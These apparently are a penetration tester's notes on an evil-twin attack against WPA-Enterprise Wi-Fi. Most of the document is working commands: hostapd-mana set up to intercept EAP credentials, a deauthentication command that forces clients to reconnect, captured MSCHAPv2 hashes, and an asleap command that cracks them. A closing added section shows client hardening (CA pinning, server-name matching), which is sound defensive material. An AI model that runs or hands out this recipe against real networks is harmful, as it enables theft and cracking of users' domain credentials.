WPA-Enterprise

WPA Enterprise authenticates each user against a central database (typically RADIUS) rather than a shared passphrase, using the Extensible Authentication Protocol (EAP).

Monitor:

airodump-ng --band abg wlan0 # no channel
airodump-ng --channel 6 wlan0 # with channel

Check / convert an existing cert:

openssl x509 -in CERT_FILENAME -noout -enddate                                   # show expiry date
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt # DER -> PEM

OR

sudo apt install freeradius

Certs are stored in "/etc/freeradius/3.0/certs"; the Makefile there builds a CA, server and client cert set:

cd /etc/freeradius/3.0/certs
make

Create certs:

mkdir -p Tools/wireless/Certs
cd Tools/wireless/Certs
openssl genrsa -out server.key 2048
openssl req -new -sha256 -key server.key -out csr.csr
openssl req -x509 -sha256 -days 365 -key server.key -in csr.csr -out server.pem
ln -s server.pem ca.pem
openssl dhparam 2048 > dhparam.pem

Create configuration:

# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g

# --------------------
# WPA configuration
# --------------------
wpa=2                                       # use WPA2 version
wpa_key_mgmt=WPA-EAP                        # use external authentication server
wpa_pairwise=TKIP CCMP                      # pairwise encryption to use

# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1                                 # requires 802.1x authentication server
eapol_key_index_workaround=0                # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1                                # enable integrated EAP server instead of RADIUS
eap_user_file=fakenet.eap_user              # filename containing information of users

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key          # private key for the server certificate
private_key_passwd=                         # password used to encrypt the private key (empty here)
dh_file=/root/certs/dhparam.pem             # file path to DH/DSA parameters file (in PEM format)

# -----------------------------
# mana specific configuration
# -----------------------------
mana_wpe=1                                  # enable WPE mode to intercept various EAP credentials
mana_eapsuccess=1                           # return EAP success to the clients, and have them connect

Create user EAP file:

*               PEAP,TTLS,TLS,MD5,GTC
"t"             TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP  "1234test"  [2]

Deauth:

aireplay-ng --deauth 50 -a D2:E9:6A:D3:B3:50 -c 02:00:00:00:03:00 --ignore-negative-one wlan0

Capture:

When a victim attempts to authenticate to our AP, the login attempt is captured.

...
wlan0: STA 00:2b:bb:b0:42:9e IEEE 802.11: authenticated
wlan0: STA 00:2b:bb:b0:42:9e IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 00:2b:bb:b0:42:9e
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: cosmo
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: cosmo
MANA EAP EAP-MSCHAPV2 ASLEAP user=cosmo | asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4
MANA EAP EAP-MSCHAPV2 JTR | cosmo:$NETNTLM$ceb69885c656590c$7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | cosmo::::7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:ceb69885c656590c
...

Crack captured creds:

asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst

Basic info:

Authentication is done against a Remote Authentication Dial-In User Service (RADIUS) server. The client authenticates with a series of EAP frames, depending on the agreed-upon authentication method, which the AP relays to the RADIUS server. If authentication succeeds, the key material produced by the EAP exchange is used as the Pairwise Master Key (PMK) for the 4-way handshake, as opposed to WPA-PSK, where the PMK is derived from the shared passphrase.

It is common to use a username and password to authenticate, which could be tied to domain credentials.
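The capture shown above only works against clients that do not verify the RADIUS server certificate, so the supplicant configuration is where this is mitigated. Added example, not part of the original notes: two wpa_supplicant network blocks for the SSID above, the weak one beside the hardened one; the CA path and RADIUS hostname are assumed placeholder values.

```ini
# Added example: wpa_supplicant network blocks, not from the original notes.
# The CA path and the RADIUS server name below are assumed placeholder values.

# WEAK: no ca_cert, so wpa_supplicant does not verify the server certificate and
# accepts any cert, including a self-signed server.pem like the one built above.
# The inner MSCHAPv2 exchange then runs against whoever answers for the SSID.
network={
    ssid="TigerSecurities"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="cosmo"
    password="REPLACE_ME"
    phase2="auth=MSCHAPV2"
}

# HARDENED: pin the CA that issued the real RADIUS server certificate and require
# the server name to match, so a rogue AP presenting its own certificate is
# rejected before any inner MSCHAPv2 exchange happens. anonymous_identity keeps
# the real username out of the unencrypted outer EAP-Identity (the "Phase 0"
# identity seen in the capture above).
network={
    ssid="TigerSecurities"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="cosmo"
    anonymous_identity="anonymous"
    password="REPLACE_ME"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"     # assumed path to the trusted CA
    domain_suffix_match="radius.corp.example"      # assumed RADIUS server hostname
    phase2="auth=MSCHAPV2"
}
```

On an enterprise fleet the same two settings (trusted CA and server name match) are what a managed Wi-Fi profile should enforce; a client without them will hand over the MSCHAPv2 challenge/response to any AP broadcasting the SSID.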
